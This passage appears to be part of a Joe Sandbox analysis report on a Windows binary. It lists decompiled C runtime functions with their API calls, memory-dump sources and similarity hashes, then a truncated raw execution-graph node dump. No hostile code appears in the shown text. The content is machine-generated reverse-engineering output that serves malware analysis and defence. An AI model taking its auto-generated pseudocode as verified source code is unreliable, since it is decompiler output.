        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
        • String ID: W\&
        • API String ID: 1857427562-1387361922
        • Opcode ID: cca6bc33cd76bd1b9e7f245ecc5d17f5535ac08f3914a20ca6f2c1e96b13fb4a
        • Instruction ID: 39dcb7cd0fb2784a1cb8ab69a8150955550f694fa09c5ede622078be21596546
        • Opcode Fuzzy Hash: cca6bc33cd76bd1b9e7f245ecc5d17f5535ac08f3914a20ca6f2c1e96b13fb4a
        • Instruction Fuzzy Hash: 3131E132A2020AABDF259F65EC49DAE7BA5EF40310F054129FC05D6250EB35CDA5CBD0
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00263E77,00000003,?,00263E17,00000003,00271DE8,0000000C,00263F2A,00000003,00000002), ref: 00263EA2
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00263EB5
        • FreeLibrary.KERNEL32(00000000,?,?,?,00263E77,00000003,?,00263E17,00000003,00271DE8,0000000C,00263F2A,00000003,00000002,00000000), ref: 00263ED8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: 1e3e832be9080082fd7db613749d6674b6eca1a80f2129bad3be4517cdc0da5c
        • Instruction ID: 0bed24f7fd3fb98934fe6d9236fb5bfe959acb8e98a2780c8860cf0cdd5d304f
        • Opcode Fuzzy Hash: 1e3e832be9080082fd7db613749d6674b6eca1a80f2129bad3be4517cdc0da5c
        • Instruction Fuzzy Hash: D7F04F30B1060DBBCB119F95EC0DB9EBFB9EF48711F014065F809A2190DB718A91DB90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00265D94() {
        				int _v8;
        				void* __ecx;
        				void* _t6;
        				int _t7;
        				char* _t13;
        				int _t17;
        				void* _t19;
        				char* _t25;
        				WCHAR* _t27;
        
        				_t27 = GetEnvironmentStringsW();
        				if(_t27 == 0) {
        					L7:
        					_t13 = 0;
        				} else {
        					_t6 = E00265D5D(_t27);
        					_pop(_t19);
        					_t17 = _t6 - _t27 >> 1;
        					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
        					_v8 = _t7;
        					if(_t7 == 0) {
        						goto L7;
        					} else {
        						_t25 = E002646B0(_t19, _t7);
        						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
        							_t13 = 0;
        						} else {
        							_t13 = _t25;
        							_t25 = 0;
        						}
        						E00264676(_t25);
        					}
        				}
        				if(_t27 != 0) {
        					FreeEnvironmentStringsW(_t27);
        				}
        				return _t13;
        			}

        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 00265D9D
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00265DC0
          • Part of subcall function 002646B0: HeapAlloc.KERNEL32(00000000,?,00000004,?,00268CDE,?,00000000,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002646E2
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00265DE6
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00265E08
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap
        • String ID:
        • API String ID: 1993637811-0
        • Opcode ID: 76ed4cde9dfe343071b43692a0c63a05511953a0282e956d668d2d38d5439fa8
        • Instruction ID: cc6247097d8f34e0be9506594a5a024d10720bd81d2b743ff46b18356e82f57b
        • Opcode Fuzzy Hash: 76ed4cde9dfe343071b43692a0c63a05511953a0282e956d668d2d38d5439fa8
        • Instruction Fuzzy Hash: 6601AC72A21A657F67211ABA6C8CC7F6D6DDFC7B607144129FD04C6240DEB18E6185F0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E002662B8(signed int _a4) {
        				signed int _t9;
        				void* _t13;
        				signed int _t15;
        				WCHAR* _t22;
        				signed int _t24;
        				signed int* _t25;
        				void* _t27;
        
        				_t9 = _a4;
        				_t25 = 0x273e88 + _t9 * 4;
        				_t24 =  *_t25;
        				if(_t24 == 0) {
        					_t22 =  *(0x26dd68 + _t9 * 4);
        					_t27 = LoadLibraryExW(_t22, 0, 0x800);
        					if(_t27 != 0) {
        						L8:
        						 *_t25 = _t27;
        						if( *_t25 != 0) {
        							FreeLibrary(_t27);
        						}
        						_t13 = _t27;
        						L11:
        						return _t13;
        					}
        					_t15 = GetLastError();
        					if(_t15 != 0x57) {
        						_t27 = 0;
        					} else {
        						_t15 = LoadLibraryExW(_t22, _t27, _t27);
        						_t27 = _t15;
        					}
        					if(_t27 != 0) {
        						goto L8;
        					} else {
        						 *_t25 = _t15 | 0xffffffff;
        						_t13 = 0;
        						goto L11;
        					}
        				}
        				_t4 = _t24 + 1; // 0x16a1918a
        				asm("sbb eax, eax");
        				return  ~_t4 & _t24;
        			}

        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0026625F,00000000,00000000,00000000,00000000,?,002664D0,00000006,FlsSetValue), ref: 002662EA
        • GetLastError.KERNEL32(?,0026625F,00000000,00000000,00000000,00000000,?,002664D0,00000006,FlsSetValue,0026E238,0026E240,00000000,00000364,?,00264D1C), ref: 002662F6
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0026625F,00000000,00000000,00000000,00000000,?,002664D0,00000006,FlsSetValue,0026E238,0026E240,00000000), ref: 00266304
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID:
        • API String ID: 3177248105-0
        • Opcode ID: 869576cca074a11acf64842192cdcd2ddaf645ba1259f048e3f81e6abcc04f6d
        • Instruction ID: 6232e0c0471b2493acab9d21eda24b251f48decafaf381deb73604ef5f051c5e
        • Opcode Fuzzy Hash: 869576cca074a11acf64842192cdcd2ddaf645ba1259f048e3f81e6abcc04f6d
        • Instruction Fuzzy Hash: 4801F736B21377ABC7215E78BC4CA567B58AF05FA0F204561F90AD3280C761D8B1C6E0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			E00264C4A(void* __ebx, void* __ecx, void* __edx) {
        				void* __edi;
        				void* __esi;
        				intOrPtr _t2;
        				void* _t3;
        				void* _t4;
        				intOrPtr _t9;
        				void* _t11;
        				void* _t20;
        				void* _t21;
        				void* _t23;
        				void* _t25;
        				void* _t27;
        				void* _t29;
        				void* _t31;
        				void* _t32;
        				long _t36;
        				long _t37;
        				void* _t40;
        
        				_t29 = __edx;
        				_t23 = __ecx;
        				_t20 = __ebx;
        				_t36 = GetLastError();
        				_t2 =  *0x273044; // 0x6
        				_t42 = _t2 - 0xffffffff;
        				if(_t2 == 0xffffffff) {
        					L2:
        					_t3 = E0026479B(_t23, 1, 0x364);
        					_t31 = _t3;
        					_pop(_t25);
        					if(_t31 != 0) {
        						_t4 = E002664A9(_t25, _t36, __eflags,  *0x273044, _t31);
        						__eflags = _t4;
        						if(_t4 != 0) {
        							E00264ABC(_t25, _t31, 0x274164);
        							E00264676(0);
        							_t40 = _t40 + 0xc;
        							__eflags = _t31;
        							if(_t31 == 0) {
        								goto L9;
        							} else {
        								goto L8;
        							}
        						} else {
        							_push(_t31);
        							goto L4;
        						}
        					} else {
        						_push(_t3);
        						L4:
        						E00264676();
        						_pop(_t25);
        						L9:
        						SetLastError(_t36);
        						E00264758(_t20, _t29, _t31, _t36);
        						asm("int3");
        						_push(_t20);
        						_push(_t36);
        						_push(_t31);
        						_t37 = GetLastError();
        						_t21 = 0;
        						_t9 =  *0x273044; // 0x6
        						_t45 = _t9 - 0xffffffff;
        						if(_t9 == 0xffffffff) {
        							L12:
        							_t32 = E0026479B(_t25, 1, 0x364);
        							_pop(_t27);
        							if(_t32 != 0) {
        								_t11 = E002664A9(_t27, _t37, __eflags,  *0x273044, _t32);
        								__eflags = _t11;
        								if(_t11 != 0) {
        									E00264ABC(_t27, _t32, 0x274164);
        									E00264676(_t21);
        									__eflags = _t32;
        									if(_t32 != 0) {
        										goto L19;
        									} else {
        										goto L18;
        									}
        								} else {
        									_push(_t32);
        									goto L14;
        								}
        							} else {
        								_push(_t21);
        								L14:
        								E00264676();
        								L18:
        								SetLastError(_t37);
        							}
        						} else {
        							_t32 = E00266453(_t25, _t37, _t45, _t9);
        							if(_t32 != 0) {
        								L19:
        								SetLastError(_t37);
        								_t21 = _t32;
        							} else {
        								goto L12;
        							}
        						}
        						return _t21;
        					}
        				} else {
        					_t31 = E00266453(_t23, _t36, _t42, _t2);
        					if(_t31 != 0) {
        						L8:
        						SetLastError(_t36);
        						return _t31;
        					} else {
        						goto L2;
        					}
        				}
        			}

        APIs
        • GetLastError.KERNEL32(?,?,0026464B,00271E70,0000000C,00262746), ref: 00264C4E
        • SetLastError.KERNEL32(00000000), ref: 00264CB6
        • SetLastError.KERNEL32(00000000), ref: 00264CC2
        • _abort.LIBCMT ref: 00264CC8
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ErrorLast$_abort
        • String ID:
        • API String ID: 88804580-0
        • Opcode ID: 82d340f4e564f17cc91e2c65371d745acc6dda8953eb7050a86b12bff6069027
        • Instruction ID: c0a1e4825a3a27ba85d700c26d5ebc424a388352a838c2e4fc84216bb02b81b8
        • Opcode Fuzzy Hash: 82d340f4e564f17cc91e2c65371d745acc6dda8953eb7050a86b12bff6069027
        • Instruction Fuzzy Hash: 92F028366316017AC6127B38BD0EF1B2A598FC2730F254115F89892392EF61CDF25860
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00262C96() {
        				void* _t4;
        				void* _t8;
        
        				E00263315();
        				E002632A9();
        				if(E00263009() != 0) {
        					_t4 = E00262FBB(_t8, __eflags);
        					__eflags = _t4;
        					if(_t4 != 0) {
        						return 1;
        					} else {
        						E00263045();
        						goto L1;
        					}
        				} else {
        					L1:
        					return 0;
        				}
        			}

        APIs
        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00262C96
        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00262C9B
        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00262CA0
          • Part of subcall function 00263009: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0026301A
        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00262CB5
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
        • String ID:
        • API String ID: 1761009282-0
        • Opcode ID: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
        • Instruction ID: b00f0dc759edb05f9e3cfb45e8f109a6409cea188fa363a7a031f599eb2c8058
        • Opcode Fuzzy Hash: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
        • Instruction Fuzzy Hash: 20C04818030A42E4AC60BBB12A131AD23100EA2786B9218C6EC5027593DE1B0BFE6D32
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E00265725(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
        				signed int _v8;
        				char _v264;
        				char _v520;
        				char _v776;
        				char _v1800;
        				char _v1814;
        				struct _cpinfo _v1820;
        				intOrPtr _v1824;
        				signed int _v1828;
        				signed int _t63;
        				void* _t67;
        				signed int _t68;
        				intOrPtr _t69;
        				void* _t72;
        				char _t73;
        				char _t74;
        				signed char _t75;
        				signed int _t76;
        				signed char _t86;
        				char _t87;
        				char _t90;
        				signed int _t93;
        				signed int _t94;
        				signed int _t95;
        				void* _t96;
        				char* _t97;
        				intOrPtr _t101;
        				signed int _t102;
        
        				_t95 = __edx;
        				_t63 =  *0x273018; // 0x16a19189
        				_v8 = _t63 ^ _t102;
        				_t2 =  &_a4; // 0x265c57
        				_t101 =  *_t2;
        				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
        					_t96 = _t101 + 0x119;
        					_t90 = 0;
        					_t67 = 0xffffff9f;
        					_t68 = _t67 - _t96;
        					__eflags = _t68;
        					_v1828 = _t68;
        					do {
        						_t97 = _t96 + _t90;
        						_t69 = _t68 + _t97;
        						_v1824 = _t69;
        						__eflags = _t69 + 0x20 - 0x19;
        						if(_t69 + 0x20 > 0x19) {
        							__eflags = _v1824 - 0x19;
        							if(_v1824 > 0x19) {
        								 *_t97 = 0;
        							} else {
        								_t72 = _t101 + _t90;
        								_t57 = _t72 + 0x19;
        								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
        								__eflags =  *_t57;
        								_t59 = _t90 - 0x20; // -32
        								_t73 = _t59;
        								goto L24;
        							}
        						} else {
        							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
        							_t54 = _t90 + 0x20; // 0x20
        							_t73 = _t54;
        							L24:
        							 *_t97 = _t73;
        						}
        						_t68 = _v1828;
        						_t96 = _t101 + 0x119;
        						_t90 = _t90 + 1;
        						__eflags = _t90 - 0x100;
        					} while (_t90 < 0x100);
        				} else {
        					_t74 = 0;
        					do {
        						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
        						_t74 = _t74 + 1;
        					} while (_t74 < 0x100);
        					_t75 = _v1814;
        					_t93 =  &_v1814;
        					_v264 = 0x20;
        					while(1) {
        						_t108 = _t75;
        						if(_t75 == 0) {
        							break;
        						}
        						_t95 =  *(_t93 + 1) & 0x000000ff;
        						_t76 = _t75 & 0x000000ff;
        						while(1) {
        							__eflags = _t76 - _t95;
        							if(_t76 > _t95) {
        								break;
        							}
        							__eflags = _t76 - 0x100;
        							if(_t76 < 0x100) {
        								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
        								_t76 = _t76 + 1;
        								__eflags = _t76;
        								continue;
        							}
        							break;
        						}
        						_t93 = _t93 + 2;
        						__eflags = _t93;
        						_t75 =  *_t93;
        					}
        					E00266E4E(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
        					E00268A70(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0);
        					E00268A70(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
        					_t94 = 0;
        					do {
        						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
        						if((_t86 & 0x00000001) == 0) {
        							__eflags = _t86 & 0x00000002;
        							if((_t86 & 0x00000002) == 0) {
        								 *((char*)(_t101 + _t94 + 0x119)) = 0;
        							} else {
        								_t37 = _t101 + _t94 + 0x19;
        								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
        								__eflags =  *_t37;
        								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
        								goto L15;
        							}
        						} else {
        							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
        							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
        							L15:
        							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
        						}
        						_t94 = _t94 + 1;
        					} while (_t94 < 0x100);
        				}
        				return E002629BB(_v8 ^ _t102);
        			}

        APIs
        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0026574A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: Info
        • String ID: $W\&
        • API String ID: 1807457897-2235781088
        • Opcode ID: b7c4f52ae674a20d6a2b737af35fbe9d94f9b69e5ec37e8d236280ebd1dc815a
        • Instruction ID: af64aec6933f7bf4dcacf6cd2847c49bc8f82f8f3bd770fac1e6fd6c12ed95f6
        • Opcode Fuzzy Hash: b7c4f52ae674a20d6a2b737af35fbe9d94f9b69e5ec37e8d236280ebd1dc815a
        • Instruction Fuzzy Hash: 37411A705147A89BDB228E64CC84BFABBADEB45308F1404EDE58A87142D2359AD5DF60
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00267008(intOrPtr _a4) {
        				intOrPtr _v8;
        				intOrPtr _t25;
        				intOrPtr* _t26;
        				intOrPtr _t28;
        				intOrPtr* _t29;
        				intOrPtr* _t31;
        				intOrPtr* _t45;
        				intOrPtr* _t46;
        				intOrPtr* _t47;
        				intOrPtr* _t55;
        				intOrPtr* _t70;
        				intOrPtr _t74;
        
        				_t74 = _a4;
        				_t25 =  *((intOrPtr*)(_t74 + 0x88));
        				if(_t25 != 0 && _t25 != 0x273648) {
        					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
        					if(_t45 != 0 &&  *_t45 == 0) {
        						_t46 =  *((intOrPtr*)(_t74 + 0x84));
        						if(_t46 != 0 &&  *_t46 == 0) {
        							E00264676(_t46);
        							E00266BC7( *((intOrPtr*)(_t74 + 0x88)));
        						}
        						_t47 =  *((intOrPtr*)(_t74 + 0x80));
        						if(_t47 != 0 &&  *_t47 == 0) {
        							E00264676(_t47);
        							E00266CC5( *((intOrPtr*)(_t74 + 0x88)));
        						}
        						E00264676( *((intOrPtr*)(_t74 + 0x7c)));
        						E00264676( *((intOrPtr*)(_t74 + 0x88)));
        					}
        				}
        				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
        				if(_t26 != 0 &&  *_t26 == 0) {
        					E00264676( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
        					E00264676( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
        					E00264676( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
        					E00264676( *((intOrPtr*)(_t74 + 0x8c)));
        				}
        				E0026717B( *((intOrPtr*)(_t74 + 0x9c)));
        				_t28 = 6;
        				_t55 = _t74 + 0xa0;
        				_v8 = _t28;
        				_t70 = _t74 + 0x28;
        				do {
        					if( *((intOrPtr*)(_t70 - 8)) != 0x273638) {
        						_t31 =  *_t70;
        						if(_t31 != 0 &&  *_t31 == 0) {
        							E00264676(_t31);
        							E00264676( *_t55);
        						}
        						_t28 = _v8;
        					}
        					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
        						_t29 =  *((intOrPtr*)(_t70 - 4));
        						if(_t29 != 0 &&  *_t29 == 0) {
        							E00264676(_t29);
        						}
        						_t28 = _v8;
        					}
        					_t55 = _t55 + 4;
        					_t70 = _t70 + 0x10;
        					_t28 = _t28 - 1;
        					_v8 = _t28;
        				} while (_t28 != 0);
        				return E00264676(_t74);
        			}

        APIs
          • Part of subcall function 00264676: HeapFree.KERNEL32(00000000,00000000,?,00266D5C,?,00000000,?,00000000,?,00266D83,?,00000007,?,?,002671A0,?), ref: 0026468C
          • Part of subcall function 00264676: GetLastError.KERNEL32(?,?,00266D5C,?,00000000,?,00000000,?,00266D83,?,00000007,?,?,002671A0,?,?), ref: 0026469E
        • ___free_lconv_mon.LIBCMT ref: 0026704C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ErrorFreeHeapLast___free_lconv_mon
        • String ID: 86'$H6'
        • API String ID: 4068849827-3673023456
        • Opcode ID: 573fa373422200d2e1b05edf697862e32f2f17e8cc7402b457796e532929bc92
        • Instruction ID: 95771267e7f82dff7fdccc1dd0f54122ab7ffda271c8586fb0243569bd653d88
        • Opcode Fuzzy Hash: 573fa373422200d2e1b05edf697862e32f2f17e8cc7402b457796e532929bc92
        • Instruction Fuzzy Hash: BC318131524306AFEB30AE38E845F56B3E9EF01364F10945AF498D7291DF31ADE08B64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E002629BB(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {
        
        				asm("repne jnz 0x5");
        				asm("repne ret");
        				asm("repne jmp 0x2e");
        				SetUnhandledExceptionFilter(0);
        				UnhandledExceptionFilter(_a4);
        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
        			}

        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002629FF
        • ___raise_securityfailure.LIBCMT ref: 00262AE6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: FeaturePresentProcessor___raise_securityfailure
        • String ID: 7'
        • API String ID: 3761405300-3510403523
        • Opcode ID: 1d5acf04c4619cb5f5ade7bff8e575651fda13b3d32257f44a8a6f8cbd6082e7
        • Instruction ID: cbc95e0f854bd962945d6313ee6b166a1953d7142782bf61e70552959614c19d
        • Opcode Fuzzy Hash: 1d5acf04c4619cb5f5ade7bff8e575651fda13b3d32257f44a8a6f8cbd6082e7
        • Instruction Fuzzy Hash: 6621EFF4661202EAD314DF15F94AA54BBE4FB48310F14506AF95C8B3A0E3B19AC5EF46
        Uniqueness

        Uniqueness Score: -1.00%

        Execution Graph

        Execution Coverage:14%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:0%
        Total number of Nodes:283
        Total number of Limit Nodes:25
64c339f 2 API calls 18858->18860 18861 64c33b0 2 API calls 18858->18861 18859->18836 18860->18859 18861->18859 18863 64c42f2 18862->18863 18864 64c42f6 18863->18864 18865 64c339f 2 API calls 18863->18865 18866 64c33b0 2 API calls 18863->18866 18864->18836 18865->18864 18866->18864 18868 64c33b0 18867->18868 18869 64c34c6 18868->18869 18871 64c33d4 18868->18871 18906 64c4400 18869->18906 18914 64c4587 18869->18914 18922 64c43ef 18869->18922 18930 64c4593 18869->18930 18870 64c348c 18870->18844 18896 64c3550 18871->18896 18901 64c3560 18871->18901 18879 64c34c6 18878->18879 18881 64c33d4 18878->18881 18884 64c43ef 2 API calls 18879->18884 18885 64c4587 2 API calls 18879->18885 18886 64c4400 2 API calls 18879->18886 18887 64c4593 2 API calls 18879->18887 18880 64c348c 18880->18844 18882 64c3550 2 API calls 18881->18882 18883 64c3560 2 API calls 18881->18883 18882->18880 18883->18880 18884->18880 18885->18880 18886->18880 18887->18880 18890 64c4278 18888->18890 18889 64c42a0 18889->18842 18890->18889 18891 64c2fd0 2 API calls 18890->18891 18891->18889 18894 64c4278 18892->18894 18893 64c42a0 18893->18842 18894->18893 18895 64c2fd0 2 API calls 18894->18895 18895->18893 18897 64c3560 18896->18897 18899 64c3fe8 2 API calls 18897->18899 18938 64c3fc4 18897->18938 18898 64c3642 18898->18870 18899->18898 18902 64c3594 18901->18902 18904 64c3fe8 2 API calls 18902->18904 18905 64c3fc4 2 API calls 18902->18905 18903 64c3642 18903->18870 18904->18903 18905->18903 18907 64c4423 18906->18907 18909 64c44bc 18907->18909 18944 64c4600 18907->18944 18949 64c46ad 18907->18949 18954 64c4610 18907->18954 18908 64c45bd 18908->18870 18909->18908 18910 64c42e0 2 API calls 18909->18910 18910->18909 18915 64c44ac 18914->18915 18917 64c44bc 18914->18917 18915->18917 18919 64c46ad 2 API calls 18915->18919 18920 64c4600 2 API calls 18915->18920 18921 64c4610 2 API calls 18915->18921 18916 64c42e0 2 API calls 18916->18917 18917->18916 18918 64c45bd 18917->18918 18918->18870 18919->18917 
18920->18917 18921->18917 18926 64c4400 18922->18926 18923 64c44bc 18924 64c45bd 18923->18924 18925 64c42e0 2 API calls 18923->18925 18924->18870 18925->18923 18926->18923 18927 64c46ad 2 API calls 18926->18927 18928 64c4600 2 API calls 18926->18928 18929 64c4610 2 API calls 18926->18929 18927->18923 18928->18923 18929->18923 18931 64c44ac 18930->18931 18932 64c44bc 18930->18932 18931->18932 18935 64c46ad 2 API calls 18931->18935 18936 64c4600 2 API calls 18931->18936 18937 64c4610 2 API calls 18931->18937 18933 64c45bd 18932->18933 18934 64c42e0 2 API calls 18932->18934 18933->18870 18934->18932 18935->18932 18936->18932 18937->18932 18940 64c3fe8 18938->18940 18939 64c4012 18939->18898 18940->18939 18941 64c424f 2 API calls 18940->18941 18942 64c40f8 2 API calls 18940->18942 18943 64c40e7 2 API calls 18940->18943 18941->18939 18942->18939 18943->18939 18946 64c4610 18944->18946 18945 64c46f2 18945->18909 18946->18945 18959 64c4730 18946->18959 18965 64c4721 18946->18965 18950 64c468a 18949->18950 18951 64c46f2 18950->18951 18952 64c4730 2 API calls 18950->18952 18953 64c4721 2 API calls 18950->18953 18951->18909 18952->18950 18953->18950 18955 64c46f2 18954->18955 18956 64c463a 18954->18956 18955->18909 18956->18955 18957 64c4730 2 API calls 18956->18957 18958 64c4721 2 API calls 18956->18958 18957->18956 18958->18956 18961 64c4735 18959->18961 18960 64c473b 18960->18946 18961->18960 18971 64c4770 18961->18971 18975 64c4761 18961->18975 18962 64c4754 